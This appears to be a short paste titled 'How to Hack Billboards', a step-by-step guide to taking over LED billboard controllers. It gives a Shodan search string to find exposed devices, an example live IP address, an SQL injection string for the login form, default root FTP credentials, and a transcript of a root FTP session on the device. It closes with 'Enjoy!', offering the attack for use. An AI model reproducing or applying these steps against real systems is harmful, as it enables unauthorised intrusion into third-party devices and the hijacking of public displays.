Untitled

How to Hack Billboards

Step 1. Register to shodan

Step 2. Look up: title:"lednet live system"

You'll find some!

Example: 186.206.188.175:8060/en/main.html

How to hack it? Well the Username Parameter is vulnerable to SQL Injection......

So to login, paste

-1558" OR 9005=9005 AND "UxGI"="UxGI

in the username parameter and anything in the password input. Now click login!


Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....

Username: root
Password: 111111

$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name ( 186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.
ftp>


You now have access to the entire server ;)

Enjoy!